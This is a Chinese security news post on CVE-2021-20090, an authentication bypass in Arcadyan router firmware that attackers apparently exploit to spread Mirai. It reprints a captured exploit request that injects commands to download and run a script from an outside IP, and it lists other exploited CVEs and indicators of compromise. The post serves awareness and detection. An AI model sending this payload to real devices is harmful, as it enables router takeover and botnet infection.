新漏洞正被在野利用,影响数百万路由器

[[416446]]

CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。

该漏洞是一个路径绕过漏洞,可导致认证绕过,攻击者可以利用其接管受影响设备的控制权。

根据 Tenable 的相关信息披露,CVE-2021-20090 漏洞被发现实际存在于 Arcadyan 固件中,这不仅影响了最初发现的 Buffalo 路由器,还影响了更多的设备。

影响范围如下所示:

在野利用

Juniper 威胁实验室近期也发现攻击者正在在野利用编号为 CVE-2021-20090 的身份验证绕过漏洞,攻击者通过其传播 Mirai 恶意软件。

  1. POST /images/..%2fapply_abstract.cgi HTTP/1.1   
  2. Connection: close   
  3. User-Agent: Dark   
  4. action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A 
  5. ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; 
  6. wget+http://212.192.241.72/lolol.sh; 
  7. curl+-O+http://212.192.241.72/lolol.sh; 
  8. chmod+777+lolol.sh; 
  9. sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4  

不止 CVE-2021-20090,新发现的攻击团伙也频繁利用新漏洞扩充军火库:

  • CVE-2020-29557(DLink routers)
  • CVE-2021-1497(Cisco HyperFlex)
  • CVE-2021-1498(Cisco HyperFlex)
  • CVE-2021-31755(Tenda AC11)
  • CVE-2021-22502(MicroFocus OBR)
  • CVE-2021-22506(MicroFocus AM)
  • exploit-db 未分配 CVE 编号但存在 PoC 的 exploit

IOC

  1. 27.22.80.19  
  2. 212.192.241.72 
  3. 9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78 
  4. 73edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d 
  5. 8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399 
  6. f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58c 
  7. e4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa9529 
  8. 80331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528 
  9. 904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc 
  10. 283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582 
  11. c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e 
  12. 70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20 

 

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/126435.html<

(0)
运维的头像运维
上一篇2025-02-24 05:16
下一篇 2025-02-24 05:17

相关推荐

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注